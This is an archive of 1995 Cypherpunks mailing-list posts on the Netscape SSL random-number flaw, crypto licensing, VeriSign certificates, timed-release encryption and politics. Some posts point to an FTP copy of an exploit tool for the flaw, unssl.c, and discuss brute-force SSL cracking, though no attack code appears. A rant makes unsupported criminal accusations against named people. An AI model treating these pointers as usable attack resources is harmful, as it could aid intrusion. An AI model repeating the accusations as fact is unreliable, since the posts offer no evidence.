'revolutionary justice', both in the Soviet Union; there are some fascinating passages of Lenin about avoiding the bourgouise invented 'justice' concept, and that the revolution was well 'above' that whole thing, and im Germany. And I guess in current China. When the people and the govering establishement has lost contact this much, you're in for trouble. (Ok, remember I'm a dumb Swede, that still happens to believe that State and People doesn't have to be enemies. And I do believe in a sensible dialog between different interest groups etc etc. Flame away, I'm just dumb anyway. ;-)) /Christian From blane at eskimo.com Mon Sep 18 12:11:50 1995 From: blane at eskimo.com (Brian Lane) Date: Mon, 18 Sep 95 12:11:50 PDT Subject: "Hackers"-- brief review and anecdote... In-Reply-To: Message-ID: On Mon, 18 Sep 1995, Steven Levy wrote: > It's my impression that the play was staged a few years after my book > came out in 1984 (though I chose the title in 1982). I remember reading > the reviews then, and they didn't > seem to mention that it was a revivial of a years-old play whose name I had > unintentially used for my own book. (Unlike the case for the current > movie, whose screenwriter seemed to know of my own book.) If > you have evidence that the play was indeed produced before 1984, please > let me know. Otherwise, I'd be happy to accept your apology, Peter. Guys, I think this has gotten a little silly. Trying to claim that anyone 'stole' a single word title is equivalent to Microsoft trying to tell other OS makers that they can't call their graphical frame things 'windows' because they thought of it first. The word 'Hackers' is a description of a group of people. It means different things to different folks (personally I like the definition/descriptions in Stephen's book) but since it is so widely used I don't see how anyone can claim to have had it stolen from them. Just as a side note, Stephen's book 'Hackers' had a substantial influence on me when I read it, and it holds a honored place among my collections of books. Brian ------------------------------------------------------------------------------ ftp.eskimo.com/blane | | www.eskimo.com/~blane ------------------------------------------------------------------------------ From adam at bwh.harvard.edu Mon Sep 18 12:25:17 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Mon, 18 Sep 95 12:25:17 PDT Subject: ftp://www.brooks.af.mil/pub/unix/utils/des.tar In-Reply-To: <199509181748.KAA17616@mycroft.rand.org> Message-ID: <199509181924.PAA09406@bwface.bwh.harvard.edu> I would expect that as the folks responsible for the FTP site, you could drag the USAF into the lawsuit as a co-defendant, then get the suit against you dropped because of the statue of limitations, leaving the AG investigating the Air Force. :) Adam | > Would someone from outside the US try to download the above file? | > It would be, at least, amusing if an Air Force site were in violation | > of the ITAR (their README notwithstanding). | | Hurm -- if Phil Karn and I knowingly allow it to remain there, that puts | us in the same position as Phil Zimmermann, right? Oh -- except that our | offenses may already be beyond the statute of limitations. -- "It is seldom that liberty of any kind is lost all at once." -Hume From turner at telecheck.com Mon Sep 18 12:29:14 1995 From: turner at telecheck.com (turner at telecheck.com) Date: Mon, 18 Sep 95 12:29:14 PDT Subject: (noise) Re: SPAM bait In-Reply-To: <199509161913.PAA55049@tequesta.gate.net> Message-ID: <9509181927.AA18728@TeleCheck.com> > nobody at alpha.c2.org (Anonymous) wrote: > > > > >Don't worry, "Janet Dove", or actually sanghi3 at grfn.org got mailbombed > >severely for this one. I'm just glad he doesn't know how to use remailers. > > Good going, Anonymous. What I don't understand about inappropriate > SPAMs like that one (or telephone ads) is; what's the business > incentive to do it? I assume that no Cypherpunk has subscribed to > JMR > I'm no lawyer (and probably wouldn't admit to it if I was.. ;) ) but in most states there are laws restricting advertisement wherein the target of the advertising does not have to pay for the privledge of being advertised to. I beleive this came about right after FAX machines started taking off, and people were sending out advertisments wasting fax paper and jamming telephone lines. Can't this be applied to the internet? I believe someone sued Visa when he was forced to receive junk e-mail on CompuServe (I think he even won.) Anyone have any info on this? From hallam at w3.org Mon Sep 18 12:59:21 1995 From: hallam at w3.org (hallam at w3.org) Date: Mon, 18 Sep 95 12:59:21 PDT Subject: Netscape's random numbers In-Reply-To: Message-ID: <9509181958.AA11906@zorch.w3.org> >Before we go to the news, perhaps we should demonstrate the exploitation of >this hole. It would certainly make selling this story a whole lot easier. In the first place it is a bit late for that. The problem is all over the net already. Expect press coverage tommorow or Wednesday. Secondly I would prefer a solution. Random number generation and maintenance is a whole lot harder than RFC 1750 makes out. Although that RFC has some usefull ideas it does not provide a blueprint fora secure ergodicity management facility. When I wrote code for Shen I was very carefull in the use I made of the output of the ergodicity manager. In particular correlation is a major concern. If a pseudo random output is exposed it must not predjudice other random values. Consider the class of attacks where Mallet receives a message from Alice and uses the knowledge of his random number to discover the random number used in Alice's later message to Bob. I always use hash functions as a "one way trap" to ensure that values cannot be reverse engineered to discover the internal state of the random number generator. I am also careful to erase all internal state before exiting the program. Phill Hallam-Baker From JonathanZ at consensus.com Mon Sep 18 13:07:16 1995 From: JonathanZ at consensus.com (Jonathan Zamick) Date: Mon, 18 Sep 95 13:07:16 PDT Subject: RSAREF Commercial Licensing Message-ID: Well I've vaccilated between making a formal, dry announcement or letting you all know my way. Given the general tenor (and individual spirit) of many on Toad it is pretty easy to guess which path I chose. So, first of all, here is to a productive future for encryption and encryption technologies. Consensus Development and RSA Data Security, have finalized the contract for Consensus to license and support RSAREF(tm) for commercial use. This isn't an advertisement for RSAREF -- as we are seeking to first present our license to those who have already expressed interest in the product to 'beta-test' our standard agreement. Meanwhile, we would like to gather some information from the net community. Our foremost concern is for those who have been using RSAREF in the past. If you have discovered any bugs which have either gone unreported or unfixed, we need to know ASAP. No bugs have been officially reported in version 2.0, however we have heard in the past that some may have been found. If a report has gotten lost during this period of transition, we'd like to know. Consensus' first priority is to make sure RSAREF is bug free. Secondly, for those who have contributed code to RSAREF in the past, or have code they'd like to submit, send email to me at the address below. Our hope is that RSAREF will continue to improve and meet the needs of its users through the co-support of both Consensus Development and our commercial and non-commercial RSAREF developers. Lastly, we would like to hear suggestions and ideas on how to improve RSAREF. We intend to remain responsive to requests, and welcome ideas for the evolution of the RSAREF toolkit. Anyway, again, have a good day. For those who would like to be on our RSAREF announcement list, send mail to with 'Subscribe' in the Subject header. Note: RSAREF is a trademarked term by RSA Data Security Thank you all for your patience, I'm sure many will be as excited as I am. Jonathan Zamick Knowledge Officer ------------------------------------------------------------------------ ..Jonathan Zamick Consensus Development Corporation.. .. 1563 Solano Ave, #355.. .. Berkeley, CA 94707-2116.. .. o510/559-1500 f510/559-1505.. ..Mosaic/WWW Home Page: .. .. Consensus Home Page .. From sameer at c2.org Mon Sep 18 13:11:24 1995 From: sameer at c2.org (sameer) Date: Mon, 18 Sep 95 13:11:24 PDT Subject: information on SSL brute force hacks wanted Message-ID: <199509182005.NAA08898@infinity.c2.org> I'm putting together the hack netscape promotion (I still need to find someone to design the t-shirt) and need to know some information. 1) Who wrote the sslbrute software package and keyserver? Who managed the distributed cracking event? 2) Who broke Hal's first challenge? Please send me names email addresses and URLs. If you know of other people who you think deserve recognition for hacking netscape products, contact me. To see the page while under construction look at http://www.c2.org/hacknetscape -- please don't link to it, as it is obviously under construction. -- sameer Voice: 510-601-9777 Network Administrator FAX: 510-601-9734 Community ConneXion: The NEXUS-Berkeley Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From perry at piermont.com Mon Sep 18 13:17:50 1995 From: perry at piermont.com (Perry E. Metzger) Date: Mon, 18 Sep 95 13:17:50 PDT Subject: Netscape's random numbers In-Reply-To: <9509181622.AA15284@sulphur.osf.org> Message-ID: <199509182017.QAA00699@frankenstein.piermont.com> Rich Salz writes: > The Netscape license explicitly prohibits decompiling (except where such > prohibition is illegal). Which probably is most of the U.S. It would be remarkably stupid for them to try to enforce the provision. Perry From iagoldbe at csclub.uwaterloo.ca Mon Sep 18 13:22:52 1995 From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg) Date: Mon, 18 Sep 95 13:22:52 PDT Subject: unssl.c available for ftp (was: Netscape's random numbers) In-Reply-To: Message-ID: <43kkdu$8qa@calum.csclub.uwaterloo.ca> In article , Dietrich J. Kappe wrote: >>Congrats, nice job! > >Yes, well done. > >Before we go to the news, perhaps we should demonstrate the exploitation of >this hole. It would certainly make selling this story a whole lot easier. > Too late. The news (in the form of a call from John Markoff, New York Times) came to Dave and me first thing this morning. In other news: unssl.c is presently in the /pub/cypherpunks/incoming/ directory on ftp.csua.berkeley.edu. Remember: you must be a "US person" to download it blah blah blah. It will (hopefully) soon move to a more suitable location under /pub/cypherpunks. The HP on my desk seems to like compiling it with "gcc -O3 -o unssl unssl.c". YMMV. - Ian "it's now about 1:20 pm PDT; I wonder when it will get exported..." From adam at homeport.org Mon Sep 18 13:42:07 1995 From: adam at homeport.org (Adam Shostack) Date: Mon, 18 Sep 95 13:42:07 PDT Subject: Good random seeds Message-ID: <199509182042.QAA02146@homeport.org> Since we can all see how badly time works, I'd like to point out that Will Price, author of the excellent Cryptdisk utility for the Mac, uses mouse movements to seed his PRNG. His code is available for a small fee, and I'd strongly suggest that people who need good, easy PRNs take a look at it, and also take a long look at RFC1750, randomness reccomendations for security (or something like that.) Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From sdw at lig.net Mon Sep 18 14:46:49 1995 From: sdw at lig.net (Stephen D. Williams) Date: Mon, 18 Sep 95 14:46:49 PDT Subject: Time release crypto Message-ID: What minimal requirements would be needed to support encrypted packets/files that a holder could only decrypt after a certain date/time? (Time Escrow?) Or a server that releases keys if a 'heartbeat' isn't or a trigger is received? (Escrow in the banking/legal sense.) (Video/sound recordings for security, opened at court's request., Ecash Escrow, missing persons) The obvious is a server that releases keys periodically (and serves old keys at will). Is there any way to make this trustable? Multiple servers with shared (xor split, etc.) keys of some kind? Design ideas? Applications: Gov. docs with expiration dates for privacy/secrecy. Source code for projects (if a company folds, copyright expires, etc.). Contract release to companies, public, etc. (15 minute stock data, agreements for commercial use initially, public/fair use later) sdw -- Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw at lig.net http://www.lig.net/sdw Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011 OO/Unix/Comm/NN ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95 From bdolan at use.usit.net Mon Sep 18 14:54:39 1995 From: bdolan at use.usit.net (Brad Dolan) Date: Mon, 18 Sep 95 14:54:39 PDT Subject: Code of Law ["Noise"] In-Reply-To: <199509181837.LAA01709@Csli.Stanford.EDU> Message-ID: On Mon, 18 Sep 1995, Christian Wettergren wrote: > > | >"The basic idea behind the movement," says > | >University of Oregon history professor Richard Brown, "is > | >'popular sovereignty,' that people are above the law. > | >These people are alienated from the legal system. To some > | >extent it sounds like they're also trying to settle > | >personal scores." > > I suddenly got very cold. > > I thinnk the world has seen enough of 'revolutionary justice', > both in the Soviet Union; there are some fascinating passages > of Lenin about avoiding the bourgouise invented 'justice' concept, > and that the revolution was well 'above' that whole thing, > > and im Germany. > > And I guess in current China. > > When the people and the govering establishement has lost contact > this much, you're in for trouble. > > (Ok, remember I'm a dumb Swede, that still happens to believe that > State and People doesn't have to be enemies. And I do believe in a > sensible dialog between different interest groups etc etc. Flame > away, I'm just dumb anyway. ;-)) > > /Christian > There has been much handwringing today over some poor guys out west who have been holding their own "common law courts," along with wonderment that they lack faith in the American justice system. In the last year we've seen in the national news: * FBI and BATF murdering, lying, & tampering with evidence. (Waco/ Ruby Ridge hearings / WTC bombing trial /etc.) * Cops confiscating cash from citizens in Atlanta, and pocketing it. * Cops fabricating evidence wholesale in Philadelphia. * Cops admitting to beating people in LA. * Cops from NYC having drunken riots in D.C. * Cops from around D.C. beating a suspect - later found to be innocent - until he was comatose. * Cops having a shootout - among themselves - in AZ. * Cops raping and murdering in New Orleans. In several of these cases, little or no punishment resulted. A couple of local incidents, in Knoxville, TN: * Several months ago, the local paper (Knoxville News-Sentinel) revealed that jailers at the city/county jail are in the habit of hanging prisoners by their wrists until their hands turn black. Those that are really disfavored are also forced to wear a vomit-filled hood. To my knowledge, no one has yet been has been taken to task for this. * Knox medical examiner Randall Pedigo was found to be drugging and raping young boys. He pulled a gun on the cops and was shot. After recovering, he was allowed to plead guilty in return for a 1-year sentence at the penal farm. The mayor of Knoxville, Victor Ashe, is active in the U.S. Conference of Mayors and has served as a spokesman for the organization. Presumably, he and they are untroubled by events like the above. I can't recall him - or them - so much as expressing concern. The "angry white men" have just figured out what the angry black men have known for a long time: that the "justice system" in the US is a tool used by some to impose their will on others. It has little if anything to do with justice. Is this radical right-wing rhetoric or is it Marxist? Or is it just a statement of fact? What percentage of the population can think this way without the jury system failing? What percentage does think this way? Is that why we're hearing calls for the abolition of the jury system? Tenuous crypto tie: Why would anyone trust these guys to hold our escrowed keys? From Chris.Claborne at SanDiegoCA.ATTGIS.COM Mon Sep 18 15:14:59 1995 From: Chris.Claborne at SanDiegoCA.ATTGIS.COM (Chris Claborne) Date: Mon, 18 Sep 95 15:14:59 PDT Subject: VeriSign Introduces the First Digital ID Issuing Service Message-ID: <9509181742.aa29912@ncrhub1.ATTGIS.COM> -----BEGIN PGP SIGNED MESSAGE----- I thought the folloing would in interesting. It looks similar to what SLED whanted to do. Would be interested to see what their method of verification is. - ------------- [Begin forwarded message ] VeriSign Introduces the First Online Digital ID Issuing Service; Users Get Unique Digital IDs to meet the Security Needs of Commerce and Communications REDWOOD CITY, Calif.--(BUSINESS WIRE)--Sept. 18, 1995--VeriSign today announced the World Wide Web's first Online Digital ID Issuing Service. Being released in conjunction with Netscape Navigator 2.0, this service will allow users to directly enroll and receive their own unique Digital IDs. VeriSign defined today the class structure of its Digital ID brand of public identification certificates, establishing four classes of identification to meet the varying security needs within different environments. The service will begin Beta testing in late October. A company or a consumer will be able to get a unique Digital ID online through VeriSign's Online Digital ID Issuing Service located on the World Wide Web. A user can register for a non-commercial Class One Digital ID at no cost, or a commercial version for $6, through an online autoresponder. This unique Class One Digital ID is designed for casual World Wide Web browsing and secure e-mail and is used by Netscape Navigator 2.0 to allow users to communicate securely and identify themselves to other users, as well as merchants on the Internet. "The Online digital ID Issuing Service was created to provide a one-step process for obtaining a Digital ID for our corporate and individual users," said Stratton Sclavos, President and CEO of VeriSign, Inc. "We are offering non-commercial users Class One Digital IDs at no cost to introduce the concepts of authentication and privacy to the market. We will also offer higher classes online using higher assurance policies. We believe Digital IDs will help everyone in the online community safely conduct their business or personal transactions over public and private networks." Public identification certificates Working closely with application developers, service providers and affiliates, VeriSign issues and manages multiple classes of Digital IDs supporting a wide range of public identification certificate-enabled products like Netscape Navigator 2.0. VeriSign's public identification certificates can be issued for individuals as well as entities such as merchant servers. These public identification certificates, categorized into four classes with escalating levels of identity assurance, can be obtained from VeriSign directly or through the Online Digital ID Issuing Service. Class One Digital IDs: These IDs insure the uniqueness of a name or e-mail address. Class One Digital IDs are primarily used for casual World Wide Web browsing and secure e-mail. VeriSign offers non-commercial Class One Digital IDs at no cost or VeriSign supported commercial versions for $6. Class Two Digital IDs: These IDs provide a higher level of assurance regarding a person's identity by involving third-party proof of name, address and other personal information provided in the registration process. Class Two Digital IDs are primarily used for inter-company e-mail, online purchasing from electronic malls and online subscriptions. Class Three Digital IDs: These IDs further raise the level of identity assurance by involving personal presence or registered credentials. Class Three Digital IDs are used primarily for transactions demanding a higher level of assurance of the identity of an individual. Typical applications include electronic banking, large-sum purchases from electronic malls and membership-based online services. VeriSign additionally offers Class Three Digital IDs for electronic commerce servers such as Netscape's Commerce Server and Open Market's Secure WebServer. Class Four Digital IDs: These IDs are for individuals and companies requiring a maximum level of identity assurance. To obtain these IDs, the individual and/or organizations they represent is more thoroughly investigated and personal presence is required. Typical applications include access to confidential information, authorization to trade financial securities, and access to corporate databases. VeriSign is the only company 100% committed to the digital authentication market. Home banking, electronic payments, and subscription based services are some of the areas in which VeriSign is working, with clients that include NASA, TRW, Netscape and Apple. VeriSign's public identification certificates offer multiple levels of identity assurance. In addition, VeriSign is extending its certificate issuing technology to include new X.509 version 3 format, which greatly expands the flexibility and capability of Digital IDs. Navigator 2.0 users will be the first customers to receive version 3 compatible Digital IDs. Being X.509 compliant, VeriSign can include authorization parameters in a Digital ID allowing both corporate and individual users to customize them according to their electronic commerce and communications needs. X.509 certificates are becoming the internationally recognized standard form of "I.D." on public and private networks. Pricing and Availability Netscape Navigator 2.0 users will be able to download Class One Digital IDs from VeriSign's new Online Digital ID Issuing Service on the World Wide Web beginning in late October. Non-commercial Class One Digital IDs will be offered at no cost, or if users desire a VeriSign supported commercial version, the cost is $6 annually. Class Two Digital IDs are available for $12 annually. Class Three Digital IDs are available for an individual for $24 annually. Corporate site license discounts are available. Class Three Digital IDs for an entity such as a corporate server are available for $290 for the first Digital ID and $95 for additional IDs at the same site annually. To obtain pricing on Class Four Digital IDs users should contact VeriSign directly. VeriSign, Inc. VeriSign provides Digital ID products and services for the electronic commerce marketplace. VeriSign's Digital IDs play a key role in ensuring the privacy and authentication of electronic transactions and communications. VeriSign, founded in 1995 as a spin-off of RSA Data Security, is working with its investors including Ameritech and Visa International, and partners such as Netscape and Apple, to open the digital marketplace to all consumers. VeriSign's goal is to provide consumers with the confidence necessary to conduct electronic commerce worldwide. For more information, contact VeriSign at 415-508-1151, or visit their Web sit at http://www.verisign.com. Note to Editors: Copyright 1995 VeriSign, Inc. 100 Marine Parkway, Redwood City, CA 94065. All rights reserved. VeriSign is a service mark and trademark of VeriSign, Inc. Digital ID, Providing Driver License for the Information Superhighway and Certificate Issuing System are all trademarks of VeriSign, Inc. All other trademarks are properties of their respective owners. CONTACT: VeriSign Inc. Web Augustine, 415/508-1151 web at verisign.com or Niehaus Ryan Haller Public Relations Marcos Sanchez, 415/615-7912 marcos at nrh.com 07:35 ET SEP 18, 1995 -----BEGIN PGP SIGNATURE----- Version: 2.7.1 iQCVAwUBMF3nBFzvpSsKhLftAQHBSQP+PCmXw9P2EWjweTIWoT65BYKgmhnxZbx0 Ig0Zi7dVgFS+dIAxTnc23p4BBBapfZMrN2Ho/zhm7csPB4+XQ65y+vDVlDH8ehvA d/b7gAtsE9tOe1YglNeeNaxba/xB2OuGN6XJHH2A8wojIPw7ALK66XMPJ6YGn24T N7eychxo61A= =xgjH -----END PGP SIGNATURE----- ... __o .. -\<, Chris.Claborne at SanDiegoCA.ATTGIS.Com ...(*)/(*). CI$: 76340.2422 http://bordeaux.sandiegoca.attgis.com/ PGP Pub Key fingerprint = A8 FA 55 92 23 20 72 69 52 AB 64 CC C7 D9 4F CA Avail on Pub Key server. PGP-encrypted e-mail welcome! From rsalz at osf.org Mon Sep 18 16:06:45 1995 From: rsalz at osf.org (Rich Salz) Date: Mon, 18 Sep 95 16:06:45 PDT Subject: Netscape's random numbers Message-ID: <9509182305.AA15954@sulphur.osf.org> >It would be remarkably stupid for them to try to enforce the >provision. Perhaps, but it that's secondary to the bad spin the media could end up having on it. Preventing that problem was a major point of my article, which discussed the media and netscape not at all. /r$ From rsalz at osf.org Mon Sep 18 16:15:29 1995 From: rsalz at osf.org (Rich Salz) Date: Mon, 18 Sep 95 16:15:29 PDT Subject: Your name in print Message-ID: <9509182315.AA16020@sulphur.osf.org> >From owner-www-security at ns2.rutgers.edu Mon Sep 18 17:36:41 1995 Received: from ns2.rutgers.edu (ns2.rutgers.edu [128.6.21.2]) by postman.osf.org (8.6.9/8.6.x) with ESMTP id RAA13528; Mon, 18 Sep 1995 17:36:34 -0400 Received: (from daemon at localhost) by ns2.rutgers.edu (8.6.12+bestmx+oldruq+newsunq/8.6.12) id MAA00546 for www-security-outgoing; Mon, 18 Sep 1995 12:35:37 -0400 Received: from whiz.mfi.com (whiz.mfi.com [198.71.19.34]) by ns2.rutgers.edu (8.6.12+bestmx+oldruq+newsunq/8.6.12) with SMTP id MAA00534 for ; Mon, 18 Sep 1995 12:35:18 -0400 Received: from ccmail2.mfi.com by whiz.mfi.com (AIX 3.2/UCB 5.64/4.03) id AA31083; Mon, 18 Sep 1995 09:26:41 -0700 Received: from ccMail by ccmail2.mfi.com id AA811441583 Mon, 18 Sep 95 09:26:23 PST Date: Mon, 18 Sep 95 09:26:23 PST >From: "Prince, Cheryl" Encoding: 663 Text Message-Id: <9508188114.AA811441583 at ccmail2.mfi.com> To: www-security at ns2.rutgers.edu Subject: security article Sender: owner-www-security at ns2.rutgers.edu Precedence: bulk Errors-To: owner-www-security at ns2.rutgers.edu Status: RO I am an editor at a business technology publication and am currently researching a piece on network security at financial institutions as well as the feasability of secure Internet transactions and banking on the world wide web. I will be interviewing individuals who can speak to these issues and can talk about whether the banking industry can in fact move much of its activity on line without risking the loss of billions of dollars to online theft and other related damage. If you are familiar with this subject matter and/or have any experience in the financial industry, please email me at: cprince at mfi.com Thanks, CJ Prince From sameer at c2.org Mon Sep 18 17:14:24 1995 From: sameer at c2.org (sameer) Date: Mon, 18 Sep 95 17:14:24 PDT Subject: unssl.c available for ftp (was: Netscape's random numbers) In-Reply-To: <43kkdu$8qa@calum.csclub.uwaterloo.ca> Message-ID: <199509190006.RAA28102@infinity.c2.org> Now available in /pub/cypherpunks/cryptanalysis Please do not export. -- sameer Voice: 510-601-9777 Network Administrator FAX: 510-601-9734 Community ConneXion: The NEXUS-Berkeley Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From tcmay at got.net Mon Sep 18 17:27:49 1995 From: tcmay at got.net (Timothy C. May) Date: Mon, 18 Sep 95 17:27:49 PDT Subject: Time release crypto Message-ID: At 10:16 PM 9/18/95, Stephen D. Williams wrote: >What minimal requirements would be needed to support encrypted packets/files >that a holder could only decrypt after a certain date/time? >(Time Escrow?) An interesting topic, of which there have been several discussions of in the past few years. A check of the archives will reveal dozens of articles. (My own archives contain more than 30 articles on this topic.) I'm not trying to squelch any debate. I would ordinarily respond to this thread, and write an article, but with all the archived articles, why bother? This last came up in a major way in June of 1994, with several articles posted by me, Eric Hughes, Eli Brandt, Peter Wayner, Russ Busdiecker, Karl Barrus, Blanc Weber, and all the Usual Suspects (but not Kiser Sose). I'll forward an article (below) I did in in 1993 on timed-release crypto. --Tim May Date: Wed, 10 Feb 93 11:55:45 -0800 To: cypherpunks at toad.com From: tcmay at netcom.com (Timothy C. May) Subject: Timed-Release Crypto Cypherpunks, I want to share with you folks some preliminary ideas on "timed-release cryptographic protocols," that is, methods for sending encrypted messages into the future. These ideas need more work, but since I have recently mentioned them to Hal Finney, Max More, Mark Miller, and perhaps others, I guess it's time to say something here. Why would anyone want to send encrypted (sealed) messages into the future? 1. Foremost, to send money into the future, while protecting it in the meantime from seizure, taxation, etc. This might be of interest to cryonics folks who want to arrange for their own revival/reanimation at some time in the future. (Existing systems have relied on creating endowments, insurance contracts, trust funds, and the like. The trust of the agent is the means for sending funds into the future--clearly this agent could be compromised, raided, taxed, put out of business, etc. Though I am personally not a cryonics client, I began thinking about this problem in 1989 and talked it over with Phil Salin, who, ironically, is now himself in cryonic suspension.) 2. To fulfill contracts with long payoff dates. One might wish to deliver money at some future date, or to supply information at some future date. 3. "In the event of my death"-type messages, with guaranteed delivery of some message or text in the event that something happens (or, of course, that the message is not "countermanded" by the sender). 4. A software publisher might place source code in a timed-release escrow, agreeing to release the code in 10 years, for whatever reason. (Of course, he may lie, but that's another issue. Possibly the digital time-stamping work of Haber and Stornetta can be used.) I'm sure you can think of other uses. I argue that this timed-release message is a kind of cryptographic primitive...though it may be argued that it's just a variant of an ordinary message transmission, albeit one through time instead of through space. Diving right in, some approaches: A message is encrypted (standard public key means, though private key methods work the same way) and "sent out." Perhaps into a network of remailers or a Cuperman-style "pool" (BTW, my compliments to Miron C. for deploying such a thing..the first of many, I suspect). The encrypted message is just a "passive" item in this scheme...it stays encrypted, is available to all, etc. (in other words, the security of the message being time-released does not in any way depend on hiding the existence or location of the encrypted message, though of course it is important that the encrypted message be widely distributed and not explicitly advertised or tagged as being a timed-release message. (Detail note: Why not? Because some governments may see timed-release messages as automatically being tax-avoiding, cryonics-supporting, seditious, etc., messages and may attempt to hunt down and erase any such messages...perhaps via "hunter-killer crypto viruses" or somesuch.) Let us suppose the encrypted message is to be unlocked in 30 years. (It could also be when some recognized event occurs, such as a Mars landing or the death of the sender, or whatever...you'll see how this works). How can the decryption key be prevented from being used in the meantime? (To make this clear: both the encryted message _and_ the decryption key are "in circulation" during all of those 30 years. Any scheme that relies on the sender himself keeping the decryption key "secret" for those 30 years is of course no fun at all...it's just what we have today and involved no new cryptographic primitives, just ordinary human-mediated secrecy.) But if the encrypted message and the decryption key are both in circulation for all of those 30 years, what's to keep someone from decrypting the message in _one_ year, for example? The answer: independent escrow agents who handle large volumes of messages and agree to hold them for various amounts of time. Because they have no idea of what's insided the encrypted messages they hold--and some may be "test" messages deposited deliberately by reputation-rating or credentialling agencies, such as "Consumers Crypto Guide"--and because their business is holding things in escrow, they will not generally open messages before the time specified. "Aha!," I hear you exclaim, "Tim's scheme depends solely on the trust of these escrow agents, and that's no different from depositing a sealed envelope with your friendly lawyer and asking him to promise not to peek." Here's how crypto and reputation-based sytems make my scenario different (and stronger, I am arguing): - an ecology of many escrow services, many pools, many encrypted-message senders makes for a more robust system against subversion of any single agent. - no escrow agent knows what is contained in a sealed message, hence the tempation to peek is reduced. (A wrinkle: escrow agents, like remailers, will probably go to automatic hardware that is tamper-resistant (cf. discussion of tamper-resistant or tamper-responding, modules in the Crypto Glossary distributed at the first physical Cypherpunks meeting and available in the archives). Thus, the hardware will automatically execute certain protocols and make peeking a pain.) - the best escrow agents (someday) may in turn increase security and their own reputations by in turn using secondary contracts, i.e., by contracting with _other_ escrow agents to seal parts or all of their messages. - what results is that the original message is scattered around in various publicly available locations (perhaps paid-for by dribbles of cryto-money from crypto escrow agents, but this is a detail easily worked out in various ways). The decryption key to the original message is itself broken up into several or many pieces and scattered to a network of "remailer"-like agents (they are essentially "remailers into the future," by agreeing as part of their protocol to hold messages for some amount of time). As time passes, these various messages (pieces, remember) are retrieved, forwarded, and generally bounced around the network. - some escrow agents may be just "fixed delay" nodes. For example, "Alice's Rest Stop" remailer node widely advertises that it will take in messages and simply delay them for some fixed time, e.g., for a year. For some fee based on message size. (Clearly the fixed time delay is a crufty approach, much less flexible than variable delays negotiated by the messages themselves, but it makes the idea clearer in some ways: a network of many such one-year delays could thus "send" a message into the future in one-year jumps.) (It is important to remember that these messages are "first-class objects," to borrow a phrase, and that all messages essentially look the same and have the same "rights" (Dean Tribble is probably barfing at my appropriation of object-oriented lingo, but it seems appropriate). That is, inspection of the bytes will not reveal to someone whether the message is a $2 message, a simple love letter, a business contract, a remailed item, a $100K cryonics payment, etc. Thus, the "authorities" cannot simply target some class of messages and ban them or launch "hunter-killer crypto viruses" against them, at least not without shutting down the whole system!) - the individual pieces may have instructions attached, such as "You will be paid 10 crypto credits if you hold me for one year and then decrypt me." (Not to belabor the point, but the means by which this "contract" can be enforced are that the escrow agents never know when they're being tested, when they're being monitored by rating services. This kind of "trust" is what allows ordinary deposit banks to work...their business is talking deposits and lending money, not repudiating the honest claims of customers.) - thus, I envision a swarm of messages being stored-and-forwarded in space and time, with an observor seeing only bits flowing around. Nobody except the original "launcher" (who needs to be fairly careful about the path he selects, about robustness against some fraction of the escrow/remailer agents going out of business, etc.) knows what's going on. - and as the end of the 30 years period approaches, to continue with the example I started with, the decryption key gets "reconstituted" in various ways (depends on what is desired, and how protocols evolve...I don't claim to have the details already worked out). For example, after 30 years the various messages stored in escrow accounts are forwarded separately to "The Immortalist Foundation," which may in fact be a digital pseudonym (as we have discussed so many times here). This entity puts the pieces together, sort of like combining the missing pieces of a text and reconstituting a genie or demon, and finds it can now unlock the original encrypted message. It finds, say, a million crypto credits, or the location of some physical treasure, or whatever. (Needless to say, there are some obvious questions about what long-term money will be stable, what banks will still exist after 30 years, and so on. I expect new forms of time deposits to evolve. Can the original sender be expected to know what will evolve before he seals his original message? Some obvious issues to work on--I never claimed it would be trivial, or static. One approach is to allow some human intervention, where an "investment agent" opens a digital money message, redeems it, and reinvests it in some new instrument. As usual, he would not know who the original investor was and would be "tested" by reputation-rating agencies. It _does_ get complicated, I know.) The Key Point: Messages sent into this network of remailers, escrow accounts, pools, and investment agents are untraceable to the sender and are generally unidentifiable. To break a single message involves breaking the entire system (or colluding with enough remailer nodes, as in any DC-Net sort of system). As with remailer networks, the expectation is that they will become sufficiently pervasive and trans-nationalized that breaking the entire system is just too painful and difficult (much the way the Net is already too pervasive to easily shut down, even if some uses of it are undesirable to various national authorities). Timed-release messages are objects that can be transmitted, encrypted, and can carry further instructions on where to mail them next, on how much digital money to pay to this next link, and various other instructions or protocols. (In other words, they are "agents" that can negotiate various contracts, for remailing , for storage, etc. Since they are "powerless" in a human sense, their security is provided by double-checks--perhaps by other agents who are watching and waiting--and by the general "shell-game" system of reputations, credentialling, and so on.) To make this scheme clearer in a simple way, I could publicly post an encrypted message to this list, or in one of the "pools," and then scatter the decryption key in several pieces with several members of this list, paying them $1 each to "hold" their piece for, say, a month. At the end of the month, they would fulfill their end of the bargain by forwarding the piece they hold to some public place or pool and the decryption key would be reconstituted (don't press me for exact details....PGP doesn't support this directly, but could). For robustness against loss of some of the messages, an n-out-of-m voting scheme could be used (e.g., any 5 of 8 pieces are sufficient to reconstruct the decryption key). The result is a message from the past, a timed-release message. I'm anxious to hear your comments. I think such a cryptographic primitive could be useful for a lot of purposes. -Tim May -- ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Mon Sep 18 17:40:19 1995 From: tcmay at got.net (Timothy C. May) Date: Mon, 18 Sep 95 17:40:19 PDT Subject: Caribbean Internet Services? Message-ID: A brief note, though the hardship to the Caribbean islands will not be brief. St. Thomas, St. Croix, and other islands were hit extremely hard by hurricane Marilyn. Previous hurricanes, including Luis, also hit some of the islands. Power in St. Thomas may not be back for a year in some parts. The roads, sewers, power lines, phone system, etc. will likely have to be completely rebuilt. (Yes, there have been more hurricanes this year than in most years...not clear if it's just a Poisson fluctuation, or 